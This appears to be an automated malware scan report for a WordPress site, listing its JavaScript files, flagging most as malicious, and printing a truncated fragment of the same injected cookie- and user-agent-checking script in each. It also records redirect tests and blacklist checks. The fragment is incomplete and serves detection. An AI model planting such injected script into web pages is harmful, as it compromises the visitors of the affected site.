Scanned pages/files
Request | Server response | Status |
http://belindomag.nl/ | 200 OK Content-Length: 95383 Content-Type: text/html | clean |
http://belindomag.nl/wp-content/plugins/jquery-updater/js/jquery-2.1.1.min.js?abd973 | 200 OK Content-Length: 85215 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://belindomag.nl/wp-includes/js/jquery/jquery-migrate.min.js?abd973 | 200 OK Content-Length: 8170 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fitvids.js?abd973 | 200 OK Content-Length: 3776 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo $this.attr('id', videoID); } $this.wrap('<div class="fluid-width-video-wrapper"></div>').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery ); jQuery(document).ready(function(){ jQuery(".gdl-page-row-wrapper, .footer-wrapper").fitVids(); }); Antivirus reports:
| ||
http://belindomag.nl/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?abd973 | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://belindomag.nl/wp-content/plugins/wp-polls/polls-js.js?abd973 | 200 OK Content-Length: 3900 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo function poll_process_success(b){jQuery(document).ready(function(a){a("#polls-"+poll_id).replaceWith(b);pollsL10n.show_loading&&a("#polls-"+poll_id+"-loading").hide();pollsL10n.show_fading&&a("#polls-"+poll_id).fadeTo("def",1);set_is_being_voted(!1)})}function set_is_being_voted(b){is_being_voted=b}; Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/superfish.js?abd973 | 200 OK Content-Length: 6929 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo $this = this.addClass(o.hoverClass), $ul = $this.children('ul'); o.onBeforeShow.call($ul); $ul.stop(true, true).animate(o.animation, o.speed, function() { o.onShow.call($ul); $this.children('a').data('follow', true); }); return this; } }); if (sf.ios) { $(window).load(function() { $('body').children().on('click', $.noop); }); } })(jQuery); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/supersub.js?abd973 | 200 OK Content-Length: 4356 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo 'float' : liFloat, 'width' : '100%', 'white-space' : 'normal' }) .each(function(){ var $childUl = $('>ul',this); var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/hoverIntent.js?abd973 | 200 OK Content-Length: 6026 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo } else { $(ob).off("mousemove.hoverIntent",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.on({'mouseenter.hoverIntent':handleHover,'mouseleave.hoverIntent':handleHover}, cfg.selector); }; })(jQuery); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.easing.js?abd973 | 200 OK Content-Length: 9271 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox.js?abd973 | 200 OK Content-Length: 20468 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo nextMethod : 'resizeIn', nextSpeed : 250, prevMethod : 'resizeOut', prevSpeed : 250, helpers : { media : {}, thumbs : { width: parseInt(ATTR.width), height: parseInt(ATTR.height) } } }); }else{ jQuery('[data-rel="fancybox"]').fancybox({ nextMethod : 'resizeIn', nextSpeed : 250, prevMethod : 'resizeOut', prevSpeed : 250, helpers : { media : {} } }); } }); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-media.js?abd973 | 200 OK Content-Length: 4019 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo href = '//' + rez[1] + '/p/' + rez[2] + '/media/?size=l'; type = 'image'; } else if ((rez = href.match(/maps\.google\.com\/(\?ll=|maps\/?\?q=)(.*)/i))) { href = '//maps.google.com/' + rez[1] + '' + rez[2] + '&output=' + (rez[2].indexOf('layer=c') ? 'svembed' : 'embed'); type = 'iframe'; } if (type) { obj.href = href; obj.type = type; } } } }(jQuery)); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-thumbs.js?abd973 | 200 OK Content-Length: 4696 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo afterShow: function (opts) { if (this.list) { this.update(opts); } else { this.init(opts); } this.list.children().removeClass('active').eq(F.current.index).addClass('active'); }, onUpdate: function () { this.update(); }, beforeClose: function () { if (this.wrap) { this.wrap.remove(); } this.wrap = null; this.list = null; this.width = 0; } } }(jQuery)); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/gdl-scripts.js?abd973 | 200 OK Content-Length: 9988 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo if( max_height < jQuery(this).height()){ max_height = jQuery(this).height(); } }); jQuery(this).children('.portfolio-item').height(max_height); }); } setTimeout(function(){ set_portfolio_height(); }, 100); jQuery(window).resize(function(){ set_personnal_height(); set_price_table_height(); set_portfolio_height() }); }); Antivirus reports:
| ||
http://belindomag.nl/wp-content/themes/worldwide-v1-01/javascript/marquee.js?abd973 | 200 OK Content-Length: 3402 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo var time = time_multiplier * jQuery(this).outerWidth(); jQuery(this).animate({ 'margin-left': -item_width }, time, 'linear', function(){ var clone_item = jQuery(this).clone(); clone_item.css({ 'margin-left': '0' }); marquee.append(clone_item); jQuery(this).remove(); reset.call(marquee.children().filter(':first')); }); }; reset.call(marquee.children().filter(':first')); }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belindomag.nl
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1816, public, public
Connection: close
Date: Sat, 08 Nov 2014 22:58:37 GMT
Pragma: public
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Length: 95383
Content-Type: text/html; charset=UTF-8
Expires: Sat, 08 Nov 2014 23:28:54 GMT
Last-Modified: Sat, 08 Nov 2014 22:28:54 GMT
...95383 bytes of data.
GET / HTTP/1.1
Host: belindomag.nl
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1816, public, public
Connection: close
Date: Sat, 08 Nov 2014 22:58:37 GMT
Pragma: public
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Length: 95383
Content-Type: text/html; charset=UTF-8
Expires: Sat, 08 Nov 2014 23:28:54 GMT
Last-Modified: Sat, 08 Nov 2014 22:28:54 GMT
...95383 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: belindomag.nl
Referer: http://www.google.com/search?q=belindomag.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: belindomag.nl
Referer: http://www.google.com/search?q=belindomag.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belindomag.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://belindomag.nl/
Result: belindomag.nl is not infected or malware details are not published yet.
Result: belindomag.nl is not infected or malware details are not published yet.